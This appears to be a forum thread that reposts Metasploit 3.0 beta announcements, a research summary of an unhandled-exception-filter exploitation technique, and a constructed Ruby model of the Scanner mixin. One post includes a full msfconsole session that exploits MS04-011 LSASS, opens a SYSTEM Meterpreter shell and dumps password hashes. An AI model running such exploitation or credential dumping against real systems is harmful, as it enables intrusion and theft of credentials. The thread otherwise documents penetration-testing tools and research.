
Originally Posted by hdm

We are happy to announce that the second beta release of the 3.0 tree is now ready for download. This release includes incremental improvements to the first beta as well as some new features and modules. 3.0 Beta 2 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.


This release marks the first time that the Subversion repository for the Metasploit Framework has been made public. Subversion provides the backend for the online update system for 3.0 and allows users of Beta 2 to synchronize with the live development tree. Prior to the final release, a stable branch will be added that will become the default update source for users of 3.0. As many folks are aware, Subversion doesn't have the best security track record, and not a few hours were spent locking down the metasploit.com repository and web service (hint: grsecurity/gradm does a great job if you can spend the time to tune per-application profiles).


The Auxiliary module system now includes the Scanner mixin. It is now possible to design a module that works on a single host, a range of hosts, or a specific number of hosts at a time. This allows for the development of modules that perform vulnerability scanning and mass-fingerprinting. Auxiliary modules can now import almost any Exploit module mixin and take advantage of some of the fancy protocol-specific APIs (SMB, DCERPC, HTTP, etc). A few examples of Auxiliary modules in Beta 2 are listed below:

The concept of "generic" payloads has been added to the Framework. This allows you to specify a class of payloads (bind shell, reverse shell, etc) instead of a specific payload, allowing the framework to pick an appropriate one at runtime based on target-specific information. This is critical for multi-platform client-side exploits and assists with some of the exploit automation features still in development. Two generic payloads are currently supported (generic/shell_bind_tcp and generic/shell_reverse_tcp). A bug was found in the generic payload support after the Beta 2 release was cut, so make sure you 'svn update' (or MSFUpdate on Windows).


The Metasploit.com web site went through another design change this weekend; the new look makes navigation easier and will pave the way for the 3.0 module browser. The image in the top left corner is part of a larger piece we commissioned from BRUTE, whom many know from his work with KMFDM. The full image will be featured on tee shirts, posters, and tattoos over the coming year.


If you have any questions about the framework, this release, or the Metasploit Project in general, we (the developers) can be reached via email (msfdev[at]metasploit.com).


Enjoy!


-HD
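To illustrate the Scanner mixin design described in the Beta 2 post above, here is an added stand-alone Ruby model; it is not the framework's own code, and only the hook names (run_host, run_batch, run_range) follow the real mixin. The Scanner module, the BannerScanner fingerprint table and the BatchCounter class are all constructed for this example and need no network access.

```ruby
# Constructed stand-alone model of the Auxiliary Scanner mixin design (not the
# framework's own code; only the hook names follow the real mixin): a module
# defines run_host, run_batch or run_range and the mixin dispatches accordingly.
require 'ipaddr'

module Scanner
  # Expand "a.b.c.d", "a.b.c.d-a.b.c.e" or "a.b.c.0/30" items (comma/space
  # separated, as in RHOSTS) into a flat list of dotted-quad strings.
  def expand_hosts(spec)
    spec.split(/[\s,]+/).flat_map do |item|
      if item.include?('/')
        IPAddr.new(item).to_range.map(&:to_s)
      elsif item.include?('-')
        first, last = item.split('-', 2).map { |s| IPAddr.new(s) }
        (first..last).map(&:to_s)
      else
        [item]
      end
    end
  end
  # Pick the dispatch mode from the hook the including module provides.
  def run(rhosts, batch_size = 256)
    hosts = expand_hosts(rhosts)
    if respond_to?(:run_range)
      run_range(hosts)                                  # whole range at once
    elsif respond_to?(:run_batch)
      hosts.each_slice(batch_size) { |b| run_batch(b) } # N hosts at a time
    else
      hosts.each { |h| run_host(h) }                    # one host at a time
    end
  end
end

# Per-host module; BANNERS is constructed data standing in for a real SMB probe.
class BannerScanner
  include Scanner
  attr_reader :results
  BANNERS = { '192.168.0.106' => 'Windows 2000 LAN Manager',
              '192.168.0.107' => 'Samba 3.0.x' }.freeze
  def initialize; @results = {}; end
  def run_host(ip); @results[ip] = BANNERS[ip]; end
end
# Batch module; records how many hosts each run_batch call received.
class BatchCounter
  include Scanner
  attr_reader :batches
  def initialize; @batches = []; end
  def run_batch(hosts); @batches << hosts.size; end
end
```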

Originally Posted by hdm

A few weeks ago, Nick Selby of the 451 Group interviewed me for a market research report about the Metasploit Project. This report was immediately available to 451 subscribers, but not to the general public. Today, TechTarget republished this report in the form of an article for their security news column. This report looks at the history of the project, our "competition", and the reasons behind the license change in version 3.0. I would like to thank Nick for giving us a fair review and taking the time to check each and every fact mentioned in the report. More information about Metasploit's relationship with the Hacker Foundation will be made available in September.

Originally Posted by skape

During the month of July, H D posted one browser bug each day on the browser fun blog. The majority of these bugs centered around issues that are typically regarded as non-exploitable, such as NULL pointer dereferences and stack overflows (not to be confused with stack-based buffer overflows). Though this may be the case, there is an interesting exploitation vector that can be applied to browsers that run on Windows, such as Internet Explorer, that can potentially leverage code execution from otherwise non-exploitable issues. The details about how this can be accomplished are described in a paper that Skywing and I have published entitled Exploiting the Otherwise Non-Exploitable on Windows.


The basic idea behind this technique involves abusing a design flaw in the way the SetUnhandledExceptionFilter routine operates which results in an attacker being able to point the top-level unhandled exception filter to an invalid address. Once this occurs, all that's necessary is to use a heap spraying technique to place code at the location that the top-level unhandled exception filter points to. The final step is to trigger an unhandled exception, such as a NULL pointer dereference, that will result in the execution of arbitrary code. Abusing the top-level unhandled exception filter has been done in the past, but this technique illustrates an indirect way to gain control that does not rely on the ability to perform a 4x4 overwrite. Furthermore, it is not limited by improvements that have been made to protect the top-level unhandled exception filter, such as through the use of function pointer encoding.


The important takeaway is that the use of this technique means that all of the otherwise non-exploitable issues reported in H D's postings can potentially be exploited in a reliable fashion through the use of this technique. However, it will only work on machines that are not patched with the latest critical updates since this issue has now been addressed by the patch that was created for MS06-051. At any rate, it would be interesting to know what other applications might be vulnerable to this type of attack as well as other interesting ways to achieve it in Internet Explorer.

Originally Posted by hdm

We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.


If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.


Some quick highlights compared to version 2.6:
- All modules are organized in a directory hierarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)


This release can be obtained from the Metasploit web site.

Unix users may need to install the openssl and zlib ruby modules for the Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby


Users of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.


Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.


Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.


A quick demonstration of using msfconsole with meterpreter:

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 -> 192.168.0.106:4444)
[*] The DCERPC service did not reply to our request

Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM

meterpreter > use priv
Loading extension priv...success.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::

meterpreter > cd c:\
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                 Name
----              ----       ----  -------------                 ----
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0          dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0          dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195        fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416     fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

meterpreter > ps

Process list
============

    PID   Name               Path
    ---   ----               ----
    176   smss.exe           \SystemRoot\System32\smss.exe
    200   csrss.exe          \??\C:\WINNT\system32\csrss.exe
    224   winlogon.exe       \??\C:\WINNT\system32\winlogon.exe
    252   services.exe       C:\WINNT\system32\services.exe
    264   lsass.exe          C:\WINNT\system32\lsass.exe
    440   svchost.exe        C:\WINNT\system32\svchost.exe
[ snip ]
    1804  wins.exe           C:\WINNT\System32\wins.exe
    2676  logon.scr          C:\WINNT\system32\logon.scr

meterpreter > kill 2676
Killing: 2676
